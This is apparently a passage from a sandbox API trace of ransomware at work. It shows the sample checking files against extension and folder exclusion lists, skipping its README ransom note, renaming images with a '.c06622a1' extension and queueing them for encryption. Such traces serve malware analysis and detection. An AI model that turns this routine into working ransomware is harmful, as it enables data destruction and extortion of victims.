_wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0167.058] wcslen (_String="msc") returned 0x3 [0167.059] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0167.059] wcslen (_String="msp") returned 0x3 [0167.059] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0167.059] wcslen (_String="msstyles") returned 0x8 [0167.059] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0167.059] wcslen (_String="msu") returned 0x3 [0167.059] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0167.059] wcslen (_String="nls") returned 0x3 [0167.059] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0167.059] wcslen (_String="nomedia") returned 0x7 [0167.059] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0167.059] wcslen (_String="ocx") returned 0x3 [0167.059] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0167.059] wcslen (_String="prf") returned 0x3 [0167.059] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0167.059] wcslen (_String="ps1") returned 0x3 [0167.059] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0167.059] wcslen (_String="rom") returned 0x3 [0167.059] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0167.059] wcslen (_String="rtp") returned 0x3 [0167.059] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0167.059] wcslen (_String="scr") returned 0x3 [0167.059] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0167.059] wcslen (_String="shs") returned 0x3 [0167.059] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0167.059] wcslen (_String="spl") returned 0x3 [0167.059] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0167.059] wcslen (_String="sys") returned 0x3 [0167.059] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0167.059] wcslen (_String="theme") returned 0x5 [0167.059] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0167.059] wcslen (_String="themepack") returned 0x9 [0167.060] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0167.060] wcslen (_String="wpx") returned 0x3 [0167.060] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0167.060] wcslen (_String="lock") returned 0x4 [0167.060] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0167.060] wcslen (_String="key") returned 0x3 [0167.060] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0167.060] wcslen (_String="hta") returned 0x3 [0167.060] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0167.060] wcslen (_String="msi") returned 0x3 [0167.060] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0167.060] wcslen (_String="pdb") returned 0x3 [0167.060] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0167.060] wcslen (_String="sqlite") returned 0x6 [0167.060] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g")) returned 0x10 [0167.060] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.060] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" [0167.060] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G") returned 0x36 [0167.060] wcscpy (in: _Dest=0x32500d6, _Source="laP3 _TZAjuy.bmp" | out: _Dest="laP3 _TZAjuy.bmp") returned="laP3 _TZAjuy.bmp" [0167.060] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp", dwFileAttributes=0x80) returned 1 [0167.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\lap3 _tzajuy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0167.061] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.061] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.062] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xc68dcae2 [0167.062] RtlComputeCrc32 (PartialCrc=0xcae2, Buffer=0x32e9a4, Length=0x80) returned 0xa1768843 [0167.062] RtlComputeCrc32 (PartialCrc=0x8843, Buffer=0x32e9a4, Length=0x80) returned 0x31b1fbaf [0167.062] RtlComputeCrc32 (PartialCrc=0xfbaf, Buffer=0x32e9a4, Length=0x80) returned 0x5c24f4eb [0167.062] RtlComputeCrc32 (PartialCrc=0xf4eb, Buffer=0x32e9a4, Length=0x80) returned 0x3906c08e [0167.062] CloseHandle (hObject=0x1ec) returned 1 [0167.062] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3262070 [0167.062] wcscpy (in: _Dest=0x3262070, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp" [0167.062] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp") returned 0x47 [0167.062] wcscpy (in: _Dest=0x32620fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.062] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\lap3 _tzajuy.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\lap3 _tzajuy.bmp.c06622a1"), dwFlags=0x8) returned 1 [0167.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\laP3 _TZAjuy.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\lap3 _tzajuy.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0167.065] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.066] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53f47646 [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x16743f00 [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x398d9ef1 [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xbd5b15b [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1e1f8d74 [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7670f7e2 [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31610b86 [0167.074] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x173a9980 [0167.077] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x5d96c663 [0167.077] RtlComputeCrc32 (PartialCrc=0xc663, Buffer=0x2690094, Length=0x80) returned 0x6fd5aa17 [0167.077] RtlComputeCrc32 (PartialCrc=0xaa17, Buffer=0x2690094, Length=0x80) returned 0x64e75a7d [0167.077] RtlComputeCrc32 (PartialCrc=0x5a7d, Buffer=0x2690094, Length=0x80) returned 0x187b7f5e [0167.077] RtlComputeCrc32 (PartialCrc=0x7f5e, Buffer=0x2690094, Length=0x80) returned 0xd3b72024 [0167.077] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.077] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.078] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3262070) returned 1 [0167.079] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9141c500, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x9141c500, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x9141c500, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.079] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.079] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0095cc0, ftCreationTime.dwHighDateTime=0x1d5dce4, ftLastAccessTime.dwLowDateTime=0x9f5a0b20, ftLastAccessTime.dwHighDateTime=0x1d5e451, ftLastWriteTime.dwLowDateTime=0x9f5a0b20, ftLastWriteTime.dwHighDateTime=0x1d5e451, nFileSizeHigh=0x0, nFileSizeLow=0xfc56, dwReserved0=0x0, dwReserved1=0x0, cFileName="vOO-vgM7Bj.png", cAlternateFileName="VOO-VG~1.PNG")) returned 1 [0167.080] _wcsicmp (_Str1="vOO-vgM7Bj.png", _Str2="README.c06622a1.TXT") returned 4 [0167.080] wcsstr (_Str="vOO-vgM7Bj.png", _SubStr="README") returned 0x0 [0167.080] _wcsicmp (_Str1="autorun.inf", _Str2="vOO-vgM7Bj.png") returned -21 [0167.080] wcslen (_String="autorun.inf") returned 0xb [0167.080] _wcsicmp (_Str1="boot.ini", _Str2="vOO-vgM7Bj.png") returned -20 [0167.080] wcslen (_String="boot.ini") returned 0x8 [0167.080] _wcsicmp (_Str1="bootfont.bin", _Str2="vOO-vgM7Bj.png") returned -20 [0167.080] wcslen (_String="bootfont.bin") returned 0xc [0167.080] _wcsicmp (_Str1="bootsect.bak", _Str2="vOO-vgM7Bj.png") returned -20 [0167.080] wcslen (_String="bootsect.bak") returned 0xc [0167.080] _wcsicmp (_Str1="desktop.ini", _Str2="vOO-vgM7Bj.png") returned -18 [0167.080] wcslen (_String="desktop.ini") returned 0xb [0167.080] _wcsicmp (_Str1="iconcache.db", _Str2="vOO-vgM7Bj.png") returned -13 [0167.080] wcslen (_String="iconcache.db") returned 0xc [0167.080] _wcsicmp (_Str1="ntldr", _Str2="vOO-vgM7Bj.png") returned -8 [0167.080] wcslen (_String="ntldr") returned 0x5 [0167.080] _wcsicmp (_Str1="ntuser.dat", _Str2="vOO-vgM7Bj.png") returned -8 [0167.080] wcslen (_String="ntuser.dat") returned 0xa [0167.080] _wcsicmp (_Str1="ntuser.dat.log", _Str2="vOO-vgM7Bj.png") returned -8 [0167.080] wcslen (_String="ntuser.dat.log") returned 0xe [0167.080] _wcsicmp (_Str1="ntuser.ini", _Str2="vOO-vgM7Bj.png") returned -8 [0167.080] wcslen (_String="ntuser.ini") returned 0xa [0167.080] _wcsicmp (_Str1="thumbs.db", _Str2="vOO-vgM7Bj.png") returned -2 [0167.080] wcslen (_String="thumbs.db") returned 0x9 [0167.080] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0167.080] wcslen (_String="386") returned 0x3 [0167.080] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0167.080] wcslen (_String="adv") returned 0x3 [0167.080] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0167.080] wcslen (_String="ani") returned 0x3 [0167.080] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0167.080] wcslen (_String="bat") returned 0x3 [0167.080] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0167.081] wcslen (_String="bin") returned 0x3 [0167.081] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0167.081] wcslen (_String="cab") returned 0x3 [0167.081] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0167.081] wcslen (_String="cmd") returned 0x3 [0167.081] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0167.081] wcslen (_String="com") returned 0x3 [0167.081] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0167.081] wcslen (_String="cpl") returned 0x3 [0167.081] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0167.081] wcslen (_String="cur") returned 0x3 [0167.081] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0167.081] wcslen (_String="deskthemepack") returned 0xd [0167.081] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0167.081] wcslen (_String="diagcab") returned 0x7 [0167.081] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0167.081] wcslen (_String="diagcfg") returned 0x7 [0167.081] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0167.081] wcslen (_String="diagpkg") returned 0x7 [0167.081] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0167.081] wcslen (_String="dll") returned 0x3 [0167.081] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0167.081] wcslen (_String="drv") returned 0x3 [0167.081] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0167.081] wcslen (_String="exe") returned 0x3 [0167.081] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0167.081] wcslen (_String="hlp") returned 0x3 [0167.081] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0167.081] wcslen (_String="icl") returned 0x3 [0167.081] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0167.081] wcslen (_String="icns") returned 0x4 [0167.081] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0167.081] wcslen (_String="ico") returned 0x3 [0167.081] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0167.082] wcslen (_String="ics") returned 0x3 [0167.082] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0167.082] wcslen (_String="idx") returned 0x3 [0167.082] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0167.082] wcslen (_String="ldf") returned 0x3 [0167.082] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0167.082] wcslen (_String="lnk") returned 0x3 [0167.082] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0167.082] wcslen (_String="mod") returned 0x3 [0167.082] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0167.082] wcslen (_String="mpa") returned 0x3 [0167.082] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0167.082] wcslen (_String="msc") returned 0x3 [0167.082] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0167.082] wcslen (_String="msp") returned 0x3 [0167.082] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0167.082] wcslen (_String="msstyles") returned 0x8 [0167.082] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0167.082] wcslen (_String="msu") returned 0x3 [0167.082] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0167.082] wcslen (_String="nls") returned 0x3 [0167.082] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0167.082] wcslen (_String="nomedia") returned 0x7 [0167.082] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0167.082] wcslen (_String="ocx") returned 0x3 [0167.082] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0167.082] wcslen (_String="prf") returned 0x3 [0167.082] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0167.082] wcslen (_String="ps1") returned 0x3 [0167.082] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0167.082] wcslen (_String="rom") returned 0x3 [0167.082] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0167.082] wcslen (_String="rtp") returned 0x3 [0167.082] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0167.083] wcslen (_String="scr") returned 0x3 [0167.083] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0167.083] wcslen (_String="shs") returned 0x3 [0167.083] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0167.083] wcslen (_String="spl") returned 0x3 [0167.083] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0167.083] wcslen (_String="sys") returned 0x3 [0167.083] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0167.083] wcslen (_String="theme") returned 0x5 [0167.083] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0167.083] wcslen (_String="themepack") returned 0x9 [0167.083] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0167.083] wcslen (_String="wpx") returned 0x3 [0167.083] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0167.083] wcslen (_String="lock") returned 0x4 [0167.083] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0167.083] wcslen (_String="key") returned 0x3 [0167.083] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0167.083] wcslen (_String="hta") returned 0x3 [0167.083] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0167.083] wcslen (_String="msi") returned 0x3 [0167.083] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0167.083] wcslen (_String="pdb") returned 0x3 [0167.083] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0167.083] wcslen (_String="sqlite") returned 0x6 [0167.083] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g")) returned 0x10 [0167.083] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.084] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G" [0167.084] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G") returned 0x36 [0167.084] wcscpy (in: _Dest=0x32500d6, _Source="vOO-vgM7Bj.png" | out: _Dest="vOO-vgM7Bj.png") returned="vOO-vgM7Bj.png" [0167.084] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png", dwFileAttributes=0x80) returned 1 [0167.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\voo-vgm7bj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0167.084] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.084] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.085] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xacce73a2 [0167.085] RtlComputeCrc32 (PartialCrc=0x73a2, Buffer=0x32e9a4, Length=0x80) returned 0xae0c32fd [0167.085] RtlComputeCrc32 (PartialCrc=0x32fd, Buffer=0x32e9a4, Length=0x80) returned 0x40da217e [0167.085] RtlComputeCrc32 (PartialCrc=0x217e, Buffer=0x32e9a4, Length=0x80) returned 0x4c599e15 [0167.085] RtlComputeCrc32 (PartialCrc=0x9e15, Buffer=0x32e9a4, Length=0x80) returned 0x69228820 [0167.085] CloseHandle (hObject=0x1e4) returned 1 [0167.085] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3262070 [0167.085] wcscpy (in: _Dest=0x3262070, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png" [0167.085] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png") returned 0x45 [0167.085] wcscpy (in: _Dest=0x32620fa, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.086] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\voo-vgm7bj.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\voo-vgm7bj.png.c06622a1"), dwFlags=0x8) returned 1 [0167.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\vOO-vgM7Bj.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\voo-vgm7bj.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0167.088] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.088] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ed33976 [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1217f1f3 [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x400416a [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x56ba96b9 [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x62ddd5f5 [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2af30328 [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x142f46db [0167.096] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1adc60f1 [0167.099] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x9d89a168 [0167.099] RtlComputeCrc32 (PartialCrc=0xa168, Buffer=0x2b70094, Length=0x80) returned 0xcfbf4636 [0167.099] RtlComputeCrc32 (PartialCrc=0x4636, Buffer=0x2b70094, Length=0x80) returned 0xabb4d56d [0167.100] RtlComputeCrc32 (PartialCrc=0xd56d, Buffer=0x2b70094, Length=0x80) returned 0x643655c4 [0167.100] RtlComputeCrc32 (PartialCrc=0x55c4, Buffer=0x2b70094, Length=0x80) returned 0xd284f2da [0167.100] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.100] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.101] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3262070) returned 1 [0167.102] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d7c0d10, ftCreationTime.dwHighDateTime=0x1d5e435, ftLastAccessTime.dwLowDateTime=0x72592250, ftLastAccessTime.dwHighDateTime=0x1d5d9c0, ftLastWriteTime.dwLowDateTime=0x72592250, ftLastWriteTime.dwHighDateTime=0x1d5d9c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_MTmDgixdwsa7RVqo", cAlternateFileName="_MTMDG~1")) returned 1 [0167.102] _wcsicmp (_Str1="$recycle.bin", _Str2="_MTmDgixdwsa7RVqo") returned -59 [0167.102] wcslen (_String="$recycle.bin") returned 0xc [0167.102] _wcsicmp (_Str1="config.msi", _Str2="_MTmDgixdwsa7RVqo") returned 4 [0167.102] wcslen (_String="config.msi") returned 0xa [0167.102] _wcsicmp (_Str1="$windows.~bt", _Str2="_MTmDgixdwsa7RVqo") returned -59 [0167.102] wcslen (_String="$windows.~bt") returned 0xc [0167.102] _wcsicmp (_Str1="$windows.~ws", _Str2="_MTmDgixdwsa7RVqo") returned -59 [0167.102] wcslen (_String="$windows.~ws") returned 0xc [0167.102] _wcsicmp (_Str1="windows", _Str2="_MTmDgixdwsa7RVqo") returned 24 [0167.102] wcslen (_String="windows") returned 0x7 [0167.102] _wcsicmp (_Str1="appdata", _Str2="_MTmDgixdwsa7RVqo") returned 2 [0167.102] wcslen (_String="appdata") returned 0x7 [0167.102] _wcsicmp (_Str1="application data", _Str2="_MTmDgixdwsa7RVqo") returned 2 [0167.102] wcslen (_String="application data") returned 0x10 [0167.102] _wcsicmp (_Str1="boot", _Str2="_MTmDgixdwsa7RVqo") returned 3 [0167.102] wcslen (_String="boot") returned 0x4 [0167.103] _wcsicmp (_Str1="google", _Str2="_MTmDgixdwsa7RVqo") returned 8 [0167.103] wcslen (_String="google") returned 0x6 [0167.103] _wcsicmp (_Str1="mozilla", _Str2="_MTmDgixdwsa7RVqo") returned 14 [0167.103] wcslen (_String="mozilla") returned 0x7 [0167.103] _wcsicmp (_Str1="program files", _Str2="_MTmDgixdwsa7RVqo") returned 17 [0167.103] wcslen (_String="program files") returned 0xd [0167.103] _wcsicmp (_Str1="program files (x86)", _Str2="_MTmDgixdwsa7RVqo") returned 17 [0167.103] wcslen (_String="program files (x86)") returned 0x13 [0167.103] _wcsicmp (_Str1="programdata", _Str2="_MTmDgixdwsa7RVqo") returned 17 [0167.103] wcslen (_String="programdata") returned 0xb [0167.103] _wcsicmp (_Str1="system volume information", _Str2="_MTmDgixdwsa7RVqo") returned 20 [0167.103] wcslen (_String="system volume information") returned 0x19 [0167.103] _wcsicmp (_Str1="tor browser", _Str2="_MTmDgixdwsa7RVqo") returned 21 [0167.103] wcslen (_String="tor browser") returned 0xb [0167.103] _wcsicmp (_Str1="windows.old", _Str2="_MTmDgixdwsa7RVqo") returned 24 [0167.103] wcslen (_String="windows.old") returned 0xb [0167.103] _wcsicmp (_Str1="intel", _Str2="_MTmDgixdwsa7RVqo") returned 10 [0167.103] wcslen (_String="intel") returned 0x5 [0167.103] _wcsicmp (_Str1="msocache", _Str2="_MTmDgixdwsa7RVqo") returned 14 [0167.103] wcslen (_String="msocache") returned 0x8 [0167.103] _wcsicmp (_Str1="perflogs", _Str2="_MTmDgixdwsa7RVqo") returned 17 